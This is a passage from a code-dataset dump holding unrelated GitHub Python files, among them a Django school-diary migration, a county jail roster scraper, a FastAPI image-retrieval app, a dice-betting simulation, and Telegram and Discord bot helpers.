p['key'] = str(player.key())\n p['name'] = player.name\n p['years'] = player.years\n return p\n\n def build_week_object(self,week):\n w = dict()\n w['id'] = week.key().id()\n w['key'] = str(week.key())\n w['year'] = week.year\n w['number'] = week.number\n w['winner'] = week.winner\n w['lock_picks'] = self.format_date(week.lock_picks)\n w['lock_scores'] = self.format_date(week.lock_scores)\n\n if week.games == None:\n w['games'] = None\n else:\n w['games'] = [ str(game_key) for game_key in week.games]\n\n return w\n\n def build_pick_object(self,pick):\n p = dict()\n p['id'] = pick.key().id()\n p['key'] = str(pick.key())\n p['week'] = pick.week\n p['player'] = pick.player\n p['game'] = pick.game\n p['winner'] = pick.winner\n p['team1_score'] = pick.team1_score\n p['team2_score'] = pick.team2_score\n return p\n\n\n def is_field_missing(self,field,data):\n if field not in data:\n self.error(400)\n self.write('%s is missing' % (field))\n return True\n return False\n\n def format_date(self,date):\n if date == None:\n return None\n else:\n if date.month < 10:\n month = \"0%s\" % (date.month)\n else:\n month = \"%s\" % (date.month)\n\n if date.day < 10:\n day = \"0%s\" % (date.day)\n else:\n day = \"%s\" % (date.day)\n\n year = \"%s\" % (date.year)\n\n if date.hour < 10:\n hour = \"0%s\" % (date.hour)\n else:\n hour = \"%s\" % (date.hour)\n\n if date.minute < 10:\n minute = \"0%s\" % (date.minute)\n else:\n minute = \"%s\" % (date.minute)\n\n return \"%s/%s/%s %s:%s\" % (month,day,year,hour,minute)\n\n def convert_to_datetime(self,date_str):\n return datetime.datetime.strptime(date_str,\"%m/%d/%Y %H:%M\")\n","repo_name":"jbholden/cdcpool_google","sub_path":"pages/api/api_handler.py","file_name":"api_handler.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25572647154","text":"from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Student',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('login', models.CharField(max_length=15, unique=True, verbose_name='Логін учня')),\n ('clas', models.CharField(choices=[('1-A', '1-A'), ('1-B', '1-B'), ('2-A', '2-A'), ('2-B', '2-B'), ('3-A', '3-A'), ('3-B', '3-B'), ('4-A', '4-A'), ('4-B', '4-B'), ('5-A', '5-A'), ('5-B', '5-B'), ('6-A', '6-A'), ('6-B', '6-B'), ('7-A', '7-A'), ('7-B', '7-B'), ('8-A', '8-A'), ('8-B', '8-B'), ('9-A', '9-A'), ('9-B', '9-B'), ('10-A', '10-A'), ('10-B', '10-B'), ('11-A', '11-A'), ('11-B', '11-B')], max_length=4, verbose_name='Клас')),\n ('last_name', models.CharField(max_length=15, verbose_name=\"Ім'я учня\")),\n ('first_name', models.CharField(max_length=15, verbose_name='Прізвище учня')),\n ('image', models.ImageField(upload_to='D:\\\\Working\\\\Praktic\\\\Project\\\\Diary\\\\student\\\\static\\\\student\\\\img', verbose_name='Аватарка учня')),\n ],\n options={\n 'verbose_name': 'Учень',\n 'verbose_name_plural': 'Учні',\n },\n ),\n migrations.CreateModel(\n name='Teacher',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('login', models.CharField(max_length=15, unique=True, verbose_name='Логін вчителя')),\n ('last_name', models.CharField(max_length=15, verbose_name=\"Ім'я вчителя\")),\n ('first_name', models.CharField(max_length=15, verbose_name='Прізвище вчителя')),\n ('predmet', models.CharField(choices=[('Алгебра', 'Алгебра'), ('Англійська мова', 'Англійська мова'), ('Астрономія', 'Астрономія'), ('Біологія', 'Біологія'), ('Біологія і екологія', 'Біологія і екологія'), ('Географія', 'Географія'), ('Геометрія', 'Геометрія'), ('Громадянська освіти', 'Громадянська освіти'), ('Зарубіжна література', 'Зарубіжна література'), ('Інформатика', 'Інформатика'), ('Історія', 'Історія'), ('Історія України', 'Історія України'), ('Математика', 'Математика'), ('Мистецтво', 'Мистецтво'), ('Музика', 'Музика'), ('Основи здоров’я', 'Основи здоров’я'), ('Правознавство', 'Правознавство'), ('Природа', 'Природа'), ('Технології', 'Технології'), ('Українська література', 'Українська література'), ('Українська мова', 'Українська мова'), ('Фізика', 'Фізика'), ('Фізична культура', 'Фізична культура'), ('Хімія', 'Хімія'), ('Я досліджую світ', 'Я досліджую світ')], max_length=255, verbose_name='Предмети')),\n ('image', models.ImageField(upload_to='D:\\\\Working\\\\Praktic\\\\Project\\\\Diary\\\\teacher\\\\static\\\\teacher\\\\img', verbose_name='Аватарка вчителя')),\n ],\n options={\n 'verbose_name': 'Вчитель',\n 'verbose_name_plural': 'Вчителі',\n },\n ),\n ]\n","repo_name":"Vervol03/Electronic_diary","sub_path":"Diary/main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3851,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74722996256","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import multivariate_normal\nfrom scipy.stats import norm\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\ndef plot_3D_multi_norm_dist_1(Mu, Sigma, show=True):\n \"\"\"\n Plot Multivariate Normal Distribution.\n :param Mu: python list or numpy array, shape = (2,)\n :param Sigma: python list or numpy matrix, shape = (2, 2)\n :param show: if true, plot.show()\n :return: None\n \"\"\"\n # Create grid and multivariate normal\n x = np.linspace(-1, 1, 100)\n y = np.linspace(-1, 1, 100)\n X, Y = np.meshgrid(x, y)\n pos = np.empty(X.shape + (2,))\n pos[:, :, 0] = X\n pos[:, :, 1] = Y\n rv = multivariate_normal(Mu, Sigma)\n # Make a 3D plot\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ax.plot_surface(X, Y, rv.pdf(pos), cmap='viridis', linewidth=0)\n ax.set_xlabel('X axis')\n ax.set_ylabel('Y axis')\n ax.set_zlabel('Z axis')\n if show == True:\n plt.show()\n\ndef plot_3D_multi_norm_dist_n(Mu_x, Mu_y, Sigma_x, Sigma_y, show=True):\n start = -1\n stop = 1\n length = stop - start\n\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n for x_i, mu_x in enumerate(Mu_x):\n x = np.linspace(start + (x_i*length), stop + (x_i*length), 100)\n sigma_x = Sigma_x[x_i, x_i]\n mu_x += (x_i)*length\n for y_i, mu_y in enumerate(Mu_y):\n y = np.linspace(start + (y_i*length), stop + (y_i*length),100)\n sigma_y = Sigma_y[y_i, y_i]\n mu_y += (y_i)*length\n X, Y = np.meshgrid(x, y)\n pos = np.empty(X.shape + (2,))\n pos[:, :, 0] = X\n pos[:, :, 1] = Y\n rv = multivariate_normal([mu_x, mu_y], [[sigma_x, 0], [0, sigma_y]])\n ax.plot_surface(X, Y, rv.pdf(pos),cmap='viridis',linewidth=0)\n ax.hold()\n\n ax.set_xlabel('X axis')\n ax.set_ylabel('Y axis')\n ax.set_zlabel('Z axis')\n plt.show()\n\ndef plot_1d_norm_dist_1(mu, sigma, show=True):\n x = np.linspace(mu-3*sigma, mu+3*sigma, 100)\n plt.figure()\n plt.plot(x, norm.pdf(x, mu, sigma))\n if show:\n plt.show()\n\ndef plot_1d_norm_dist_n(Mu, Sigma, show=True):\n fig = plt.figure()\n canvas = FigureCanvas(fig)\n ax = fig.add_subplot(111)\n ax.set_ylim(0,40)\n ax.set_xlim(-3,3)\n for i, mu in enumerate(Mu):\n sigma = Sigma[i, i]\n # length = (3*sigma)*2\n # mu += (i*length)\n x = np.linspace(mu-3*sigma, mu+3*sigma, 100)\n ax.plot(x, norm.pdf(x, mu, sigma))\n if show:\n plt.show()\n canvas.draw()\n width, height = fig.get_size_inches() * fig.get_dpi()\n width = int(width)\n height = int(height)\n info_dict = {\"canvas\": canvas, \"height\": height, \"width\":width}\n return info_dict\n\nif __name__ == '__main__':\n num_features = 10\n Mu_w = np.zeros(num_features)\n Sigma_w = np.eye(num_features) * 1e-1\n plot_1d_norm_dist_1(Mu_w[0], Sigma_w[0, 0])\n plot_1d_norm_dist_n(Mu_w, Sigma_w)\n plot_3D_multi_norm_dist_1(Mu_w, Sigma_w)\n plot_3D_multi_norm_dist_n(Mu_w, Mu_w, Sigma_w,Sigma_w)\n\n","repo_name":"yun-long/rl_prototype","sub_path":"rl/misc/norm_dist_plot.py","file_name":"norm_dist_plot.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17438813361","text":"class Business:\n def __init__(self,id,business_type,name,appointment_time,country,city,code,street,house_nr,email,phone,id_owner):\n self.id=id\n self.business_type = business_type\n self.name=name\n self.appointment_time=appointment_time\n self.country=country\n self.city=city\n self.code=code\n self.street=street\n self.house_nr=house_nr\n self.email=email\n self.phone=phone\n self.id_owner=id_owner\n\n# {\n# \"business_type\" : \"\",\n# \"name\" : \"\",\n# \"appointment_time\" : \"\",\n# \"country\" : \"\",\n# \"city\" : \"\",\n# \"code\" : \"\",\n# \"street\": \"\",\n# \"house_nr\": \"\",\n# \"email\" : \"\",\n# \"phone\" : \"\",\n# \"id_owner\" : \"\"\n# }\n# {\n# \"firstname\" : \"\",\n# \"lastname\" : \"\",\n# \"date_of_birth\" : \"\",\n# \"email\" : \"\",\n# \"phone\" : \"\"\n# }","repo_name":"Nabil-Lahssini/Final_Dev_Sprint-1","sub_path":"python/api/src/Entity/business.py","file_name":"business.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30429732714","text":"import os, sys\nfrom os.path import exists, join\nfrom coot import *\n\nuse_gui_qm = False #coot_utils requires this variable to be defined\n\n#search the Python path for coot_utils\nfor curpath in sys.path:\n abspath = join(curpath, \"coot_utils.py\")\n if exists(abspath):\n #when we find it, exec it\n \n #but first exec redefine_functions.py if it's in the same directory\n #redefine_functions.py renames func_py() to func(), which used to be done in coot_utils.py itself\n #new versions of coot_utils.py requires this renaming to be done before being exec'ed\n redefAbspath = join(curpath, \"redefine_functions.py\")\n if exists(redefAbspath):\n execfile(redefAbspath)\n \n execfile(abspath)\n break\n","repo_name":"pemsley/coot","sub_path":"rcrane/coot_utils_adapter.py","file_name":"coot_utils_adapter.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"34"} +{"seq_id":"17516785795","text":"########## STEP 1: Import your libraries! ##########\n\nimport csv\nimport requests, mechanize\nfrom bs4 import BeautifulSoup\n\ncsvfile = open('jail.csv', 'a')\njail_writer = csv.writer(csvfile)\n\n########## STEP 2: Get the HTML! ##########\n\nurl = 'https://report.boonecountymo.org/mrcjava/servlet/RMS01_MP.I00030s?max_rows=500'\n\nbr = mechanize.Browser()\nbr.open(url)\nhtml = br.response().read()\n\n########## STEP 3: Make soup! ##########\n\nsoup = BeautifulSoup(html, \"html.parser\")\n\n########## STEP 4: Dig through the HTML ##########\n\nmain_table = soup.find('tbody', {'id': 'mrc_main_table'})\n\nrow_list = main_table.find_all('tr')\n\nfor row in row_list:\n\n td_tags = row.find_all('td')\n\n output = []\n for td in td_tags:\n output.append(td.text.strip())\n\n jail_writer.writerow(output)","repo_name":"cjdd3b/advanced-data-journalism-jailscrape","sub_path":"new-jailscrape.py","file_name":"new-jailscrape.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"34312424910","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nfrom dataReader import dataReader\nfrom utils import flow2motion\n\n_temp = __import__(\"flownet2-pytorch.utils.flow_utils\", globals(), locals(), ['flow2img', 'readFlow'], 0)\nflow2img = _temp.flow2img\nreadFlow = _temp.readFlow\n\n\n\npath = '../Desktop/Dataset/Change Detection Dataset/dataset2014/dataset/PTZ/intermittentPan/'\n\ndr = dataReader()\nfiles = dr.readFiles(str(path)+'input', \".jpg\")\ngroundTruthFiles = dr.readFiles(str(path)+'groundtruth', \".png\")\nflowFiles = dr.readFiles(path+'flow', 'flo')\n\nmcdResults = dr.readFiles(str(path)+'mcdMask', \".jpg\")\nmcdFlowResults = dr.readFiles(path+'mcdFlowMask', 'jpg')\nflowFiles = dr.readFiles(path+'flow', 'flo') \n\n\nidx = 1623 #1830 #851\n\nimg = cv2.imread(files[idx])\nheight, width, _ = img.shape\n\ngt = cv2.imread(groundTruthFiles[idx])\n\nmcd = cv2.imread(mcdResults[idx], 0)\nmcdFlow = cv2.imread(mcdFlowResults[idx])\n\nflow = readFlow(flowFiles[idx-8])\nflowImg = flow2img(flow)\nmag, motion = flow2motion(flow)\n\n\nout = mcd\nchangeBgMean = np.mean(mag[out==0])\nchangeFgMean = np.mean(mag[out>0])\n\nprint(\"backgroung mean change of magnitude: %.3f FG: %.3f\" %(changeBgMean, changeFgMean))\nmeanMotionFlow = np.mean(mag[motion>0])\nprint(\"mean of motion detected from Flow: \", meanMotionFlow)\n\ncv2.imshow(\"img\", img)\ncv2.imshow(\"gt\", gt)\ncv2.imshow(\"mcd\", mcd)\ncv2.imshow(\"mag\", mcdFlow)\ncv2.imshow(\"motion from flow\", flowImg)\n\n\nfig, axarr = plt.subplots(1,6)\n\naxarr[0].imshow(img)\naxarr[0].axis('off')\naxarr[0].set_title('Input')\n\naxarr[1].imshow(gt, cmap='gray')\naxarr[1].axis('off')\naxarr[1].set_title('Ground truth')\n\naxarr[2].imshow(mcd, cmap='gray')\naxarr[2].axis('off')\naxarr[2].set_title('fastMCD')\n\naxarr[3].imshow(mag, cmap='gray')\naxarr[3].axis('off')\naxarr[3].set_title('Flow magnitude')\n\naxarr[4].imshow(motion, cmap='gray')\naxarr[4].axis('off')\naxarr[4].set_title('Magnitude Otsu threshold')\n\nif (meanMotionFlow - changeBgMean) < 10:\n print(\"flow motion result can not be trusted!!\")\n motion[:] = 0\n\naxarr[5].imshow(motion, cmap='gray')\naxarr[5].axis('off')\naxarr[5].set_title('M(flow)')\n\nplt.show()\n\n\ncv2.waitKey(0)\n\n","repo_name":"irfan7787/motion-detection","sub_path":"show-mag-mcd.py","file_name":"show-mag-mcd.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6748901402","text":"s = input()\nk = input()\n\nstart = 0\ntime = 0\nfor _ in range(len(s)):\n start = s.find(k,start)\n if start == -1:\n break\n end = start + len(k) - 1\n print(f'({start}, {end})')\n\n start += 1\n time += 1\n\nif start == -1 and time ==0:\n print(\"(-1, -1)\")\n \n\n\"\"\"\nSample Input\n\naaadaa\naa\nSample Output\n\n(0, 1) \n(1, 2)\n(4, 5)\n\"\"\"\n","repo_name":"mdshahadothosen2001/cp","sub_path":"A Hacker Rank/hackerrank_py/51.start-end-find.py","file_name":"51.start-end-find.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40158913820","text":"import sys\nimport shutil\nfrom fastapi import FastAPI, Form, Request, File, UploadFile\nimport uvicorn\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport time\nfrom fastapi.responses import HTMLResponse\nfrom fastapi.templating import Jinja2Templates\nfrom fastapi.staticfiles import StaticFiles\nimport pickle\nfrom sklearn.neighbors import NearestNeighbors\n\n\nsys.path.append('source')\nfrom IR_models.textbased import *\nfrom IR_models.contentbased import *\n\napp = FastAPI()\napp.mount('/static', StaticFiles(directory='source/static'), name='static')\ntemplates = Jinja2Templates(directory='source/views')\n\n# text\nID_CORPUS, CORPUS = pickle.load(open('source/corpus', 'rb'))\nVECTOR_DOC = vectorizer.fit_transform(CORPUS)\n\n# content\nFILENAME_LIST, IMG_CORPUS = pickle.load(open('source/corpus_img', 'rb'))\nknn = NearestNeighbors(n_neighbors=10, metric='euclidean')\nknn.fit(IMG_CORPUS)\n\n@app.get('/index.html', response_class=HTMLResponse)\ndef index(request: Request):\n context = {'request': request}\n return templates.TemplateResponse('index.html', context)\n\n@app.get('/contentbased.html', response_class=HTMLResponse)\ndef index(request: Request):\n context = {'request': request}\n return templates.TemplateResponse('contentbased.html', context)\n\n\n@app.post('/text-based_query')\nasync def IR_textbased(request: Request, query: str = Form(...)):\n start = time.time()\n vector_query = preprocessing_query(query)\n similar = cosine_similarity(VECTOR_DOC, vector_query).flatten()\n related_docs_indices = similar.argsort()[:-(10+1):-1]\n \n related_img_name = []\n for _, id in enumerate(related_docs_indices):\n img_name = str(ID_CORPUS[id]) + '.png'\n img_path = os.path.join('/img/', img_name)\n related_img_name.append(img_path)\n # show_img_retrieved(related_docs_indices, ID_CORPUS)\n stop = time.time()\n running_time = f'{round((stop - start) * 1000)} ms'\n\n output = {'query': query, 'running_time': running_time, 'image_name': related_img_name}\n return templates.TemplateResponse('index.html', {'request': request,'output': output})\n\n\n@app.post('/content-based_query')\nasync def IR_contentbased(request: Request, file: UploadFile = File(...)):\n dir_query = 'source/static/img_query'\n for f in os.listdir(dir_query):\n os.remove(os.path.join(dir_query, f))\n if file:\n query_location = f'source/static/img_query/{file.filename}'\n with open(query_location, \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n start = time.time()\n feature_query = []\n feature_query.append(extract_feature(query_location))\n feature_query = np.array(feature_query)\n knn.fit(IMG_CORPUS)\n indices = knn.kneighbors(feature_query, return_distance=False)\n related_img_name = []\n for i in indices[0]:\n img_path = os.path.join('/img/', FILENAME_LIST[i])\n related_img_name.append(img_path)\n stop = time.time()\n running_time = f'{round((stop - start) * 1000)} ms'\n query_path = query_location[13:]\n output = {'query_path': query_path, 'running_time': running_time, 'image_name': related_img_name}\n \n return templates.TemplateResponse('contentbased.html', {'request': request, 'output': output})\n\nif __name__ == \"__main__\":\n uvicorn.run(app)","repo_name":"thanhthanhthile/image-retrieval","sub_path":"source/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"38516442858","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n\nimport random\nimport queue\nimport time\nimport threading\n\nmoney_list = []\ncount_dict = {1: 0,\n 2: 0,\n 3: 0,\n 4: 0,\n 5: 0,\n 6: 0,\n 7: 0,\n }\nq = queue.Queue(10)\n\ndef kaijiang(a, b, c):\n if a == b == c:\n # print('aaaaa')\n # print(a, b, c, '豹子')\n # baozi += 1\n count_dict[7] += 1\n return 7\n else:\n if a + b + c < 11:\n # da += 1\n return 1\n else:\n #\n return 0\n\n\ndef zhuang():\n flag = True\n while True:\n if q.full():\n # print('full')\n # time.sleep(0.5)\n pass\n else:\n # print('摇了一次骰子')\n a = random.randrange(1, 7)\n b = random.randrange(1, 7)\n c = random.randrange(1, 7)\n d = [a, b, c]\n q.put(d)\n count_dict[a] += 1\n\n\ndef xian():\n i = 0 # 循环次数\n da = 0 # 大\n xiao = 0 # 小\n baozi = 0 # 豹子数量\n money = 10000 # 初始金钱数\n tingshou = 12000\n number = 10000 # 总参与次数\n m = 100 # 每次投注金额\n n = 1 # 当前投注翻倍数\n y = 0 # 0小 1大 7豹子\n while i < number:\n # print(str(i).center(30, '-'))\n x, y = divmod(i, 2)\n # print(x, y)\n # time.sleep(1)\n if money <= 0:\n print('共计', i, '次,把钱输光了')\n break\n elif money > tingshou:\n print('共计', i, '次,赚了:',money)\n return 1\n else:\n date = q.get()\n\n a = date[0]\n b = date[1]\n c = date[2]\n # print(a, b, c)\n # 投注\n t_money = m * n\n if t_money > money:\n print('不够投注了')\n print('共计', i, '次,赚了:', money)\n break\n # print('投注:', t_money)\n\n money -= t_money\n # print('还剩:', money)\n result = kaijiang(a, b, c)\n # 统计大小\n if result == 0:\n xiao += 1\n elif result == 1:\n da += 1\n\n elif result == 7:\n baozi += 1\n else:\n print('err')\n # 判断输赢\n if y == result:\n money += (t_money*2)\n n = 1\n # print('赢了', t_money)\n else:\n # n *= 2\n if n >= 32:\n n = 1\n else:\n n *= 2\n # print('输了', t_money)\n i += 1\n money_list.append(money)\n # time.sleep(5)\n\n print('共计:', i)\n print('大:', '%.2f%%' % (da*100/i))\n print('小:', '%.2f%%' % (xiao*100/i))\n print('豹子:', '%.2f%%' % (baozi*100/i))\n print(i,xiao,da,baozi)\n\nif __name__ == '__main__':\n\n t1 = threading.Thread(target=zhuang,)\n # t2 = threading.Thread(target=xian, )\n t1.start()\n # t2.start()\n # t2.join()\n xian()\n # print(q.qsize())\n # print(count_dict)\n print('钱最多的时候:', max(money_list))\n\n\n","repo_name":"topsai/PycharmProjects","sub_path":"骰子/庄家.py","file_name":"庄家.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"42213447137","text":"l=[]\nfor i in range(4):\n t=eval(input(\"Enter the tuple:\"))\n l.append(t)\nen,on=0,0\nprint()\nfor i in range(4):\n for j in range(4):\n if i==0 or i==3 or j==0 or j==3:\n print(l[i][j],end=\" \")\n if l[i][j]%2==0:\n en+=1\n else:\n on+=1\n else:\n print(\" \",end=\" \")\n print()\nprint(\"\\nThe number of odd numbers are:\",on)\nprint(\"The number of even numbers are:\",en)\n","repo_name":"PiyushVarman/Class-11-Project-Files","sub_path":"Class XI- Python Programs/Examination Programs/Pre-Annual/Q30.py","file_name":"Q30.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12120376795","text":"\"\"\"\nThe code is a Python script that defines functions and a state machine using the aiogram library,\nwhich is an asynchronous framework for building Telegram bots.\nThe functions are used to handle user input and update the bot's state accordingly.\n\"\"\"\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram import types\nfrom ..models import Book\nfrom asgiref.sync import sync_to_async\nTO_CANCEL = 'добавить_книгу добавить_слово все_слова все_книги /контактные_данные /местоположение'\n\n\n@sync_to_async\ndef create_book(name, url, user_id) -> None:\n \"\"\"Создать новый объект класса Book с заданным именем и URL\"\"\"\n Book.objects.create(name=name, url=url, user_id=user_id)\n\n\nclass FSMbook(StatesGroup):\n \"\"\"Определяет состояния для машины состояний, используемой для добавления новой книги\"\"\"\n name = State()\n url = State()\n user_id = State()\n\n\nasync def book_add_start(message: types.Message) -> None:\n \"\"\"Функция для начала процесса добавления новой книги\"\"\"\n await FSMbook.name.set()\n await message.reply('Введите название книги. \\nДля отмены напишите \"отмена\".', parse_mode='HTML')\n\n\nasync def cancel_add_book(message: types.Message, state: FSMbook) -> None:\n \"\"\"Функция для отмены процесса добавления новой книги\"\"\"\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await message.reply('Добавление отменено')\n\n\nasync def add_book_name(message: types.Message, state: FSMbook) -> None:\n \"\"\"Функция для добавления имени новой книги\"\"\"\n if message.text in TO_CANCEL:\n await message.reply('Ошибка. Вы отправили новую команду.')\n await cancel_add_book(message, state)\n return\n async with state.proxy() as data:\n data['name'] = message.text\n data['user_id'] = message.from_user.id\n\n await FSMbook.next()\n await message.reply('Введите URL книги. \\nДля отмены напишите \"отмена\".', parse_mode='HTML')\n\n\nasync def add_book_url(message: types.Message, state: FSMbook) -> None:\n \"\"\"Функция для добавления URL новой книги\"\"\"\n async with state.proxy() as data:\n data['url'] = message.text\n\n async with state.proxy() as data:\n await create_book(data['name'], data['url'], data['user_id'])\n await message.answer(text='Книга добавлена!')\n await state.finish()\n\n\ndef register_add_book(dp: Dispatcher) -> None:\n \"\"\"Функция для регистрации обработчиков для добавления новой книги\"\"\"\n # dp.register_message_handler(book_add_start, commands=['add_book'], state=None)\n dp.register_message_handler(book_add_start, state='*', commands='добавить_книгу')\n dp.register_message_handler(book_add_start, Text(equals='добавить_книгу', ignore_case=True), state=\"*\")\n dp.register_message_handler(cancel_add_book, state='*', commands='отмена')\n dp.register_message_handler(cancel_add_book, Text(equals='отмена', ignore_case=True), state=\"*\")\n dp.register_message_handler(add_book_name, state=FSMbook.name)\n dp.register_message_handler(add_book_url, state=FSMbook.url)\n","repo_name":"Neki4ar1/bot","sub_path":"Socrat/Socrat/handlers/add_book.py","file_name":"add_book.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12068349413","text":"import subprocess\r\nimport neat\r\nfrom agents import run, winner_play, manual_play\r\nfrom plot import plot\r\nfrom visualize_network import draw_net\r\nimport helpers\r\n\r\n\r\ndef ai_selected() -> None:\r\n config_path = helpers.get_config_path()\r\n config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, config_path)\r\n\r\n if(helpers.check_genome_path()):\r\n winner_play(helpers.get_genome(helpers.get_genome_path()), config)\r\n else:\r\n run(config)\r\n draw_net(config, helpers.get_genome(helpers.get_genome_path()), filename=helpers.get_network_graph_path(), node_names=helpers.get_node_names())\r\n plot()\r\n\r\ndef manual_selected() -> None:\r\n manual_play()\r\n\r\ndef retrain_selected() -> None:\r\n config_path = helpers.get_config_path()\r\n config = neat.config.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet, neat.DefaultStagnation, config_path)\r\n\r\n run(config) \r\n draw_net(config, helpers.get_genome(helpers.get_genome_path()), filename=helpers.get_network_graph_path(), node_names=helpers.get_node_names())\r\n plot() \r\n\r\ndef open_network_selected() -> None:\r\n if helpers.check_network_graph_path():\r\n path = helpers.get_network_graph_path() + '.pdf'\r\n proc = subprocess.Popen([path], shell=True)\r\n\r\n try:\r\n proc.communicate(timeout=15)\r\n except subprocess.TimeoutExpired:\r\n proc.kill()\r\n else:\r\n pass\r\n","repo_name":"Sziszka90/DinoAI","sub_path":"menu_selection.py","file_name":"menu_selection.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"786112943","text":"\ndef leitura(texto, tempo):\n if isfloat(tempo):\n tempo = float(tempo)\n return [texto, tempo]\n return [0, 0]\n\ndef isfloat(value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\nasync def saida(vc):\n try:\n await vc.disconnect()\n except Exception as e:\n print(e)\n\ndef create_command_json(command_name : str, duration) -> str:\n \"\"\"\n Creates a 'query' to insert into firebase\n\n Parameters\n ----------\n - command_name -> str\n * name of the command to be recorded\n - duration -> either int or float (doesn't matter)\n * duration of the command in seconds\n \"\"\"\n return(f\"\"\"{{\\n\\t\"{command_name}\":\\n\\t{{\\n\\t\\t\"Duration\": {duration}\\n\\t}}\\n}}\"\"\")","repo_name":"CaricaturiJosias/Discord_bot","sub_path":"bot_suite/tools/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29143727101","text":"from datetime import datetime, timedelta, timezone\nfrom opentelemetry import trace\n\nfrom lib.db import db\nimport logging\n\n# get root logger\nhome_logger = logging.getLogger('app') \n\ntracer = trace.get_tracer(\"home.activities\")\n\nclass HomeActivities:\n def run(cognito_user_id=None):\n home_logger.info('message from INSIDE home activities module')\n with tracer.start_as_current_span(\"home-activites-mock-data\"):\n now = datetime.now(timezone.utc).astimezone()\n span = trace.get_current_span()\n span.set_attribute(\"app.now\", now.isoformat())\n sql = db.template('activities','home')\n results = db.query_array_json(sql)\n span.set_attribute(\"app.result_length\", len(results))\n return results\n","repo_name":"paulegg1/aws-bootcamp-cruddur-2023","sub_path":"backend-flask/services/home_activities.py","file_name":"home_activities.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"27534157493","text":"from subject import Subject, SubjectCollection\nfrom typing import List\nfrom random import choices\n\nimport pandas as pd\n\nimport numpy as np\nimport pandas as pd\n\nfrom scipy.ndimage.filters import gaussian_filter\n\n\nVERBOSE = True\nLOG = lambda s: print(f\"[AUG] {s}\") if VERBOSE else None\n\n\n\"\"\"\nAugmentation techniques to be used:\n 1. Gaussian filter\n 2. Scale\n 3. Flips\n\n (https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5977656/pdf/2730723.pdf)\n\"\"\"\n\ndef gaussian(image: np.ndarray) -> np.ndarray:\n return image\n\ndef scale(image: np.ndarray) -> np.ndarray:\n return image\n\ndef flip(image: np.ndarray) -> np.ndarray:\n return image\n\n\nOP_LIST = (\n gaussian,\n scale,\n flip\n)\n\n\ndef augment(subjects: SubjectCollection, class_balancing = True, count_multiplier = 1.0) -> List[np.ndarray]:\n \"\"\"\n Augments the `subjects` list.\n\n If `class_balancing` is `True`, the classes will be\n balanced as a first step of augmentation.\n\n `count_multiplier` specifies the amount of new data\n that will be generated by multiplying the initial\n data count.\n\n Note that all subjects that were not augmented\n will remain as a `Nifti2Image`, not a `np.ndarray`.\n This is done in an effort to reduce memory consumption.\n \"\"\"\n\n if class_balancing:\n LOG(\"Balancing classes...\")\n\n subjects = balance_classes(subjects, subjects.metada)\n\n LOG(\"All the subjects that were not augmented will remain as a `Nifti2Image`.\")\n LOG(\"Make sure to call get_data on them or `utils.flatten_subjects` to retrieve the `np.ndarray`.\")\n\n return subjects\n\n\ndef balance_classes(subjects: SubjectCollection, metadata: pd.DataFrame) -> 